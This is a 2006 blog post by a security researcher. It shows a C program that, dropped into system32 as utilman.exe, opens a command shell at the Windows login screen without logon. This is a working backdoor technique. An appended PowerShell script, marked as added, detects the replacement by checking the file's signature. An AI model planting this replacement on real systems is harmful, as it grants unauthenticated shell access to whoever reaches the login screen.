Didier Stevens

Thursday 31 August 2006

My second playdate with utilman.exe

Filed under: Hacking — Didier Stevens @ 20:46

Comments posted by evilbitz on my Playing with utilman.exe post gave me a great idea for another experiment with utilman.exe:

You can compile the following example with Borland’s free C++ 5.5 compiler.

Fourth experiment

Compile this simple C program, name it utilman.exe and put it in the system32 directory:

#include <stdio.h>
#include <windows.h>
#include <tchar.h>

void _tmain(void)
{
    STARTUPINFO s;
    PROCESS_INFORMATION p;
    /* CreateProcess may modify the command line, so pass a writable copy */
    LPTSTR szCmdline = _tcsdup(TEXT("CMD"));
    /* Window station and desktop the new process will be attached to */
    LPTSTR szDesktop = _tcsdup(TEXT("WinSta0\\Winlogon"));

    ZeroMemory(&s, sizeof(s));
    s.cb = sizeof(s);
    s.lpDesktop = szDesktop;
    ZeroMemory(&p, sizeof(p));

    /* Start CMD in its own console on the desktop named in s.lpDesktop */
    CreateProcess(NULL, szCmdline, NULL, NULL, FALSE, CREATE_NEW_CONSOLE, NULL, NULL, &s, &p);

    CloseHandle(p.hProcess);
    CloseHandle(p.hThread);
}

Whenever you press the magic key sequence (Windows Logo key & U key), a command shell will open on the Winlogon desktop. And you don’t have to be logged on to do this.
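
A replacement like the one in this experiment shows up when the signature of the file in system32 is checked. The PowerShell below is an added example, not code from the original post; it assumes Windows PowerShell 5.1 or later, and the property names of the result object are illustrative.

```powershell
# Added example (not from the original post): verify that the utilman.exe
# in system32 is still a validly signed Microsoft binary.
# Assumes Windows PowerShell 5.1+, where Get-AuthenticodeSignature also
# validates catalog-signed OS files.
$path = Join-Path $env:SystemRoot 'System32\utilman.exe'

$file = Get-Item -LiteralPath $path -ErrorAction Stop
$sig  = Get-AuthenticodeSignature -LiteralPath $path
$hash = Get-FileHash -LiteralPath $path -Algorithm SHA256

# A program compiled locally and dropped over utilman.exe carries no trusted
# signature, so Status will not be 'Valid'.
$signedOk = $sig.Status -eq 'Valid'

# Even with a valid signature, the signer should be Microsoft.
$subject     = if ($sig.SignerCertificate) { $sig.SignerCertificate.Subject } else { '' }
$microsoftOk = $subject -like '*O=Microsoft Corporation*'

# Collect everything an investigator would want in one record.
$result = [pscustomobject]@{
    Path             = $path
    SignatureStatus  = $sig.Status
    Signer           = $subject
    IsOSBinary       = $sig.IsOSBinary
    OriginalFilename = $file.VersionInfo.OriginalFilename
    LastWriteTimeUtc = $file.LastWriteTimeUtc
    SHA256           = $hash.Hash
    Suspicious       = -not ($signedOk -and $microsoftOk)
}
$result | Format-List

if ($result.Suspicious) {
    Write-Warning "utilman.exe does not verify as a Microsoft-signed binary: $($sig.StatusMessage)"
    exit 1
}
```

The recorded SHA256 and LastWriteTimeUtc give a baseline to compare against on later runs.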
